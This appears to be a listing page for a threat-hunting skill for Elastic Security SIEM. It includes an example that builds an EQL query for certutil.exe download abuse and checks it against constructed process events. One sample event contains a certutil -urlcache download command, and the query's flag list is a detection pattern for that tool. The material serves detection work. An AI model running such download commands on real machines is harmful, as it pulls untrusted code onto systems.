performing-threat-hunting-with-elastic-siem


Performs proactive threat hunting in Elastic Security SIEM using KQL/EQL queries, detection rules, and Timeline investigation to identify threats that evade automated detection. Use when SOC teams need to hunt for specific ATT&CK techniques, investigate anomalous behaviors, or validate detection coverage gaps using Elasticsearch and Kibana Security.

Category: AI & Automation · 12,642 stars · 1,468 forks · Updated today · License: Apache-2.0


Quality Score: 99/100

| Component     | Weight | Score |
|---------------|--------|-------|
| Stars         | 20%    | 100   |
| Recency       | 20%    | 100   |
| Frontmatter   | 20%    | 70    |
| Documentation | 15%    | 100   |
| Issue Health  | 10%    | 50    |
| License       | 10%    | 100   |
| Description   | 5%     | 100   |

Skill Content

# Performing Threat Hunting with Elastic SIEM

## When to Use

Use this skill when:

- SOC teams need to proactively search for threats not caught by existing detection rules
- Threat intelligence reports describe new TTPs requiring validation against historical data
- Red team exercises reveal detection gaps that need hunting query development
- Periodic hunting cadence requires structured hypothesis-driven investigations

**Do not use** for real-time alert triage — that belongs in the Elastic Security Alerts queue with automated detection rules.

## Prerequisites

- Elastic Security 8.x+ with Security app enabled in Kibana
- Data ingestion via Elastic Agent (Endpoint Security integration) or Beats (Winlogbeat, Filebeat, Packetbeat)
- Data normalized to Elastic Common Schema (ECS) field mappings
- User role with `kibana_security_solution` and `read` access to relevant indices
- MITRE ATT&CK framework knowledge for hypothesis generation

## Workflow

### Step 1: Develop Hunting Hypothesis

Start with a hypothesis based on threat intelligence, an ATT&CK technique, or an anomaly:

**Example Hypothesis**: "Attackers are using living-off-the-land binaries (LOLBins) for execution, specifically certutil.exe for file downloads (T1105 — Ingress Tool Transfer)."

Define scope:

- **Data sources**: `logs-endpoint.events.process-*`, `logs-windows.sysmon_operational-*`
- **Time range**: Last 30 days
- **Expected indicators**: certutil.exe with `-urlcache`, `-split`, or `-decode` flags

### Step ...
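The Step 1 scope turned into a query and an offline check, as an added Python example that is not part of the skill or its repository: it renders the hypothesis as an EQL query for a Timeline or detection rule and applies the same predicate to constructed ECS-style process events (`SCOPE`, `SAMPLE_EVENTS` and the fixed clock `NOW` are assumptions; the indices and flags are the ones the hypothesis names).

```python
from datetime import datetime, timedelta, timezone

# Added example, not from the skill repo. Scope values (indices, flags) are the
# ones the hypothesis in Step 1 names; the event records below are constructed.
SCOPE = {
    "indices": ["logs-endpoint.events.process-*", "logs-windows.sysmon_operational-*"],
    "days": 30,
    "process": "certutil.exe",
    "flags": ["-urlcache", "-split", "-decode"],
}

def build_eql(scope=SCOPE):
    """Render the hypothesis as an EQL query for Timeline or a detection rule."""
    flags = ", ".join(f'"*{f}*"' for f in scope["flags"])
    return ('process where event.type == "start" and '
            f'process.name : "{scope["process"]}" and '
            f'process.command_line : ({flags})')

def matches(event, scope=SCOPE, now=None):
    """Apply the same predicate to one ECS-shaped event dict (offline check)."""
    now = now or datetime.now(timezone.utc)
    if now - datetime.fromisoformat(event["@timestamp"]) > timedelta(days=scope["days"]):
        return False                      # outside the 30-day hunting window
    if event.get("event", {}).get("type") != "start":
        return False                      # only process-start events
    proc = event.get("process", {})
    if proc.get("name", "").lower() != scope["process"]:
        return False
    cmd = proc.get("command_line", "").lower()
    return any(flag in cmd for flag in scope["flags"])

def hunt(events, scope=SCOPE, now=None):
    """Return (host, command_line) for every event that satisfies the hypothesis."""
    return [(e["host"]["name"], e["process"]["command_line"])
            for e in events if matches(e, scope, now)]

# Fixed clock plus three constructed events: one true hit, one benign certutil
# use, and one hit that falls outside the time range.
NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)
SAMPLE_EVENTS = [
    {"@timestamp": "2024-05-30T10:00:00+00:00", "event": {"type": "start"},
     "host": {"name": "ws-01"}, "process": {"name": "certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"}},
    {"@timestamp": "2024-05-29T10:00:00+00:00", "event": {"type": "start"},
     "host": {"name": "ws-02"}, "process": {"name": "certutil.exe",
     "command_line": "certutil.exe -verifystore My"}},
    {"@timestamp": "2024-03-01T10:00:00+00:00", "event": {"type": "start"},
     "host": {"name": "ws-03"}, "process": {"name": "certutil.exe",
     "command_line": "certutil.exe -decode in.b64 out.bin"}},
]
```

`hunt(SAMPLE_EVENTS, now=NOW)` returns only the ws-01 hit: ws-02 is a benign certutil use without the hunted flags, and ws-03 matches the flags but is older than the 30-day window, which is the same filtering the EQL query performs once pasted into Timeline with that time range.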

Details

- Author: mukul975
- Repository: mukul975/Anthropic-Cybersecurity-Skills
- Created: 3 months ago
- Last Updated: today
- Language: Python
- License: Apache-2.0
